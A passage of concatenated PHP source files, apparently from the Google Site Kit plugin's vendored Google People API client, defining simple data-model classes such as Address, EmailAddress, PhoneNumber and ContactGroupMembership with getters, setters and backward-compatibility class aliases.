getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Url::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Url'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class CoverPhoto extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $default; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $url; /** * @param bool */ public function setDefault($default) { $this->default = $default; } /** * @return bool */ public function getDefault() { return $this->default; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\CoverPhoto::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_CoverPhoto'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Interest extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Interest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Interest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class UserDefined extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $key; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setKey($key) { $this->key = $key; } /** * @return string */ public function getKey() { return $this->key; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\UserDefined::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_UserDefined'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchUpdateContactsResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $updateResultType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonResponse::class; protected $updateResultDataType = 'map'; /** * @param PersonResponse[] */ public function setUpdateResult($updateResult) { $this->updateResult = $updateResult; } /** * @return PersonResponse[] */ public function getUpdateResult() { return $this->updateResult; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchUpdateContactsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Event extends \Google\Site_Kit_Dependencies\Google\Model { protected $dateType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date::class; protected $dateDataType = ''; /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @param Date */ public function setDate(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date $date) { $this->date = $date; } /** * @return Date */ public function getDate() { return $this->date; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Event::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Event'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Occupation extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Occupation::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Occupation'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchUpdateContactsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sources'; protected $contactsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $contactsDataType = 'map'; /** * @var string */ public $readMask; /** * @var string[] */ public $sources; /** * @var string */ public $updateMask; /** * @param Person[] */ public function setContacts($contacts) { $this->contacts = $contacts; } /** * @return Person[] */ public function getContacts() { return $this->contacts; } /** * @param string */ public function setReadMask($readMask) { $this->readMask = $readMask; } /** * @return string */ public function getReadMask() { return $this->readMask; } /** * @param string[] */ public function setSources($sources) { $this->sources = $sources; } /** * @return string[] */ public function getSources() { return $this->sources; } /** * @param string */ public function setUpdateMask($updateMask) { $this->updateMask = $updateMask; } /** * @return string */ public function getUpdateMask() { return $this->updateMask; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchUpdateContactsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchUpdateContactsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class UpdateContactPhotoResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $personType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $personDataType = ''; /** * @param Person */ public function setPerson(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $person) { $this->person = $person; } /** * @return Person */ public function getPerson() { return $this->person; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_UpdateContactPhotoResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class EmailAddress extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\EmailAddress::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_EmailAddress'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Address extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $city; /** * @var string */ public $country; /** * @var string */ public $countryCode; /** * @var string */ public $extendedAddress; /** * @var string */ public $formattedType; /** * @var string */ public $formattedValue; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $poBox; /** * @var string */ public $postalCode; /** * @var string */ public $region; /** * @var string */ public $streetAddress; /** * @var string */ public $type; /** * @param string */ public function setCity($city) { $this->city = $city; } /** * @return string */ public function getCity() { return $this->city; } /** * @param string */ public function setCountry($country) { $this->country = $country; } /** * @return string */ public function getCountry() { return $this->country; } /** * @param string */ public function setCountryCode($countryCode) { $this->countryCode = $countryCode; } /** * @return string */ public function getCountryCode() { return $this->countryCode; } /** * @param string */ public function setExtendedAddress($extendedAddress) { $this->extendedAddress = $extendedAddress; } /** * @return string */ public function getExtendedAddress() { return $this->extendedAddress; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param string */ public function setFormattedValue($formattedValue) { $this->formattedValue = $formattedValue; } /** * @return string */ public function getFormattedValue() { return $this->formattedValue; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setPoBox($poBox) { $this->poBox = $poBox; } /** * @return string */ public function getPoBox() { return $this->poBox; } /** * @param string */ public function setPostalCode($postalCode) { $this->postalCode = $postalCode; } /** * @return string */ public function getPostalCode() { return $this->postalCode; } /** * @param string */ public function setRegion($region) { $this->region = $region; } /** * @return string */ public function getRegion() { return $this->region; } /** * @param string */ public function setStreetAddress($streetAddress) { $this->streetAddress = $streetAddress; } /** * @return string */ public function getStreetAddress() { return $this->streetAddress; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Address::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Address'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class FileAs extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FileAs::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_FileAs'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class PhoneNumber extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $canonicalForm; /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setCanonicalForm($canonicalForm) { $this->canonicalForm = $canonicalForm; } /** * @return string */ public function getCanonicalForm() { return $this->canonicalForm; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\PhoneNumber::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_PhoneNumber'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BraggingRights extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BraggingRights::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BraggingRights'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class CalendarUrl extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $url; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\CalendarUrl::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_CalendarUrl'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class CreateContactGroupRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $contactGroupType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class; protected $contactGroupDataType = ''; /** * @var string */ public $readGroupFields; /** * @param ContactGroup */ public function setContactGroup(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup $contactGroup) { $this->contactGroup = $contactGroup; } /** * @return ContactGroup */ public function getContactGroup() { return $this->contactGroup; } /** * @param string */ public function setReadGroupFields($readGroupFields) { $this->readGroupFields = $readGroupFields; } /** * @return string */ public function getReadGroupFields() { return $this->readGroupFields; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\CreateContactGroupRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_CreateContactGroupRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ImClient extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedProtocol; /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $protocol; /** * @var string */ public $type; /** * @var string */ public $username; /** * @param string */ public function setFormattedProtocol($formattedProtocol) { $this->formattedProtocol = $formattedProtocol; } /** * @return string */ public function getFormattedProtocol() { return $this->formattedProtocol; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setProtocol($protocol) { $this->protocol = $protocol; } /** * @return string */ public function getProtocol() { return $this->protocol; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ImClient::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ImClient'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Membership extends \Google\Site_Kit_Dependencies\Google\Model { protected $contactGroupMembershipType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMembership::class; protected $contactGroupMembershipDataType = ''; protected $domainMembershipType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\DomainMembership::class; protected $domainMembershipDataType = ''; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @param ContactGroupMembership */ public function setContactGroupMembership(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMembership $contactGroupMembership) { $this->contactGroupMembership = $contactGroupMembership; } /** * @return ContactGroupMembership */ public function getContactGroupMembership() { return $this->contactGroupMembership; } /** * @param DomainMembership */ public function setDomainMembership(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\DomainMembership $domainMembership) { $this->domainMembership = $domainMembership; } /** * @return DomainMembership */ public function getDomainMembership() { return $this->domainMembership; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Membership::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Membership'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ContactGroupMembership extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $contactGroupId; /** * @var string */ public $contactGroupResourceName; /** * @param string */ public function setContactGroupId($contactGroupId) { $this->contactGroupId = $contactGroupId; } /** * @return string */ public function getContactGroupId() { return $this->contactGroupId; } /** * @param string */ public function setContactGroupResourceName($contactGroupResourceName) { $this->contactGroupResourceName = $contactGroupResourceName; } /** * @return string */ public function getContactGroupResourceName() { return $this->contactGroupResourceName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMembership::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ContactGroupMembership'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Source extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $etag; /** * @var string */ public $id; protected $profileMetadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ProfileMetadata::class; protected $profileMetadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $updateTime; /** * @param string */ public function setEtag($etag) { $this->etag = $etag; } /** * @return string */ public function getEtag() { return $this->etag; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param ProfileMetadata */ public function setProfileMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ProfileMetadata $profileMetadata) { $this->profileMetadata = $profileMetadata; } /** * @return ProfileMetadata */ public function getProfileMetadata() { return $this->profileMetadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Source::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Source'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ContactGroupMetadata extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $deleted; /** * @var string */ public $updateTime; /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ContactGroupMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * 